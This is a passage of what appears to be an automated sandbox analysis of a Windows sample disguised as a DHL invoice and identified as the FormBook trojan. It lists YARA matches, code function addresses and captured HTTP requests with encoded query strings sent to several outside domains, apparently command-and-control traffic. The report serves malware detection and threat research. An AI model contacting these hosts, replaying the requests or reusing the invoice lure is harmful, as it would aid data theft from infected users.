Source: global traffic	HTTP traffic detected: GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=WgPRl/FvoZMBo2mlKPlxV15+dFE2DaQPOh4rMMuZqba7P4QkcwKBZ2znWxmeG8Vu0cfzpyTmzFPFRI6Qoo1H9rMyaIuGGCESsA== HTTP/1.1Host: www.bondiev.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?jXu=m7uzBk1mijYTNPshBFAqU72ljYeWgHJ5zfNDKvzfwbEYFcgOzP3ENcHYjhFO4jv2du7qUOKEZ20+Boj0NvLgszRV7s0TsfUd4g==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1Host: www.rahaingoadvice.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=sqJyaOVlBjEZAVpKslMv4znBhJqv2M2fNLntWooOtuBpve/S7gqmy/xe6Ibp48h7Rh2wKtnd+VCpDIBxA7ILq3XVPp4nW+NhJA== HTTP/1.1Host: www.altruista.oneConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?jXu=zrLMOBLzw3r4M3Z/yuOODvZ2qFQg4fDKObavmOYF/mbdwyJReU8Eih7YSll5LHsPS7aScgEYlXeSWE+YT/OxrgX5e4N2j5d5AQ==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1Host: www.guvnorsnyc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?hZ=5jUpdPs&jXu=HtWyrRohZK7c8fd1APLwWRwJtB7cGxmiY3g361wIUH2W8bW5L0CPXM6H8QPzIx/FgYOXceqeXuSZGo2tEZEI7T7kC34NLHSzSQ== HTTP/1.1Host: www.christophersubala.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?jXu=gWBUvkz7Th1w/4or5wJyBYQATVQKYMhDH/gPz8FNlyuh7t8wp+tSlul7hgK6xuyfJYQ1BxvuzK7AKBkx6IgPVHnLyXh5nXmxBA==&hZ=5jUpdPs HTTP/1.1Host: www.legaldanaa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=CcRoIk99VuHdxqnbMe4fCWW8YB6+5lBHd7AattmFAjuGnedAqC5z1GiP1/3phXFikd8x5PSyWZu2r/HN2vGAs2KGSq5bV7fyPg== HTTP/1.1Host: www.driftreiki.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?jXu=kcJq9nCJTS4AFFwj7BlSbUJdrqCJ4OLHyr4dETNtRmrAiFNjS8qpkfsQCBiZREWazvDc3jnj6JXUK3q6f67/6iJXzv9OIKzSdg==&hZ=5jUpdPs HTTP/1.1Host: www.clickthelink.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /d0ad/?hZ=5jUpdPs&jXu=49olzBrEkQ26Tp/WHMIPDJTv6mbk8Gc8H+fn1MAfyMOe8tpEzipk9UZUSo3gyKb1yEBNApLz6gZQFbalc5fPAhgkZeVbYS3Sjg== HTTP/1.1Host: www.creotopi.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe

Code function: 1_2_0040542B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

1_2_0040542B

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 00000005.00000002.22562649783.0000000003200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.18086535230.00000000034FA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.18145335068.000000001D400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.18125375902.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.18078540950.00000000034FA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.22568686367.0000000003BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000005.00000002.22562649783.0000000003200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.22562649783.0000000003200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.22562649783.0000000003200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000000.18086535230.00000000034FA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.18086535230.00000000034FA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.18086535230.00000000034FA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.18145335068.000000001D400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.18145335068.000000001D400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.18145335068.000000001D400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.18125375902.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.18125375902.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.18125375902.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000000.18078540950.00000000034FA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.18078540950.00000000034FA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.18078540950.00000000034FA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.22568686367.0000000003BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.22568686367.0000000003BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.22568686367.0000000003BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: DHL-INVOICE-MBV.exe PID: 4144, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: WWAHost.exe PID: 1436, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: DHL-INVOICE-MBV.exe

Executable has a suspicious name (potential lure to open the executable)

Source: DHL-INVOICE-MBV.exe

Static file information: Suspicious name

Source: DHL-INVOICE-MBV.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 00000005.00000002.22562649783.0000000003200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.22562649783.0000000003200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.22562649783.0000000003200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000000.18086535230.00000000034FA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.18086535230.00000000034FA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.18086535230.00000000034FA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.18145335068.000000001D400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.18145335068.000000001D400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.18145335068.000000001D400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.18125375902.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.18125375902.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.18125375902.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000000.18078540950.00000000034FA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.18078540950.00000000034FA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.18078540950.00000000034FA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.22568686367.0000000003BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.22568686367.0000000003BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.22568686367.0000000003BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: DHL-INVOICE-MBV.exe PID: 4144, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: WWAHost.exe PID: 1436, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe

Code function: 1_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

1_2_00403359

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe

File created: C:\Windows\resources\0409

Jump to behavior

Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_00404C68	1_2_00404C68
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0040698E	1_2_0040698E
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_74111B63	1_2_74111B63
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_03283B6E	1_2_03283B6E
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0327B4BB	1_2_0327B4BB
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0327D70A	1_2_0327D70A
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0327EF74	1_2_0327EF74
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_03281F45	1_2_03281F45
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0327EF5B	1_2_0327EF5B
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0327E7B7	1_2_0327E7B7
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0327E7BE	1_2_0327E7BE
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0327DBB9	1_2_0327DBB9
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0327EFF7	1_2_0327EFF7
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0327E3C8	1_2_0327E3C8
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0327E7D2	1_2_0327E7D2
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0327D7DA	1_2_0327D7DA
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_03291236	1_2_03291236
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0327A206	1_2_0327A206
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0329165D	1_2_0329165D
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_03281AAA	1_2_03281AAA
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_03281A9B	1_2_03281A9B
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0327A29D	1_2_0327A29D
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0327A2E2	1_2_0327A2E2
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_03293AE1	1_2_03293AE1
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0327DAE8	1_2_0327DAE8
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0327D6F5	1_2_0327D6F5
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0327F2C2	1_2_0327F2C2
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0327F13F	1_2_0327F13F
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0327A16D	1_2_0327A16D
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0328154E	1_2_0328154E
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0327D9AF	1_2_0327D9AF
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_03290DB4	1_2_03290DB4
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0327A19D	1_2_0327A19D
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0327C1FE	1_2_0327C1FE
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_03281439	1_2_03281439
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0328143E	1_2_0328143E
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0327F065	1_2_0327F065
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_03293471	1_2_03293471
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0327ECA5	1_2_0327ECA5
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_03281CAD	1_2_03281CAD
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0328149C	1_2_0328149C
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0327E0EC	1_2_0327E0EC
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 1_2_0327D8DD	1_2_0327D8DD
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B0D69	3_2_1D7B0D69
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D84FDF4	3_2_1D84FDF4
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7AAD00	3_2_1D7AAD00
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D86FD27	3_2_1D86FD27
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B9DD0	3_2_1D7B9DD0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D867D4C	3_2_1D867D4C
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7C2DB0	3_2_1D7C2DB0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B3C60	3_2_1D7B3C60
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D849C98	3_2_1D849C98
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7BAC20	3_2_1D7BAC20
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A0C12	3_2_1D7A0C12
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D837CE8	3_2_1D837CE8
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D87ACEB	3_2_1D87ACEB
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B8CE0	3_2_1D7B8CE0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7CFCE0	3_2_1D7CFCE0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D82EC20	3_2_1D82EC20
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7C8CDF	3_2_1D7C8CDF
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D85EC4C	3_2_1D85EC4C
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D86EC60	3_2_1D86EC60
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D866C69	3_2_1D866C69
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D86EFBF	3_2_1D86EFBF
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D861FC6	3_2_1D861FC6
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7BCF00	3_2_1D7BCF00
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B6FE0	3_2_1D7B6FE0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D82FF40	3_2_1D82FF40
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D86FF63	3_2_1D86FF63
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D860EAD	3_2_1D860EAD
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7D0E50	3_2_1D7D0E50
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7F2E48	3_2_1D7F2E48
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D869ED2	3_2_1D869ED2
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A2EE8	3_2_1D7A2EE8
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B1EB2	3_2_1D7B1EB2
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D850E6D	3_2_1D850E6D
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D86E9A6	3_2_1D86E9A6
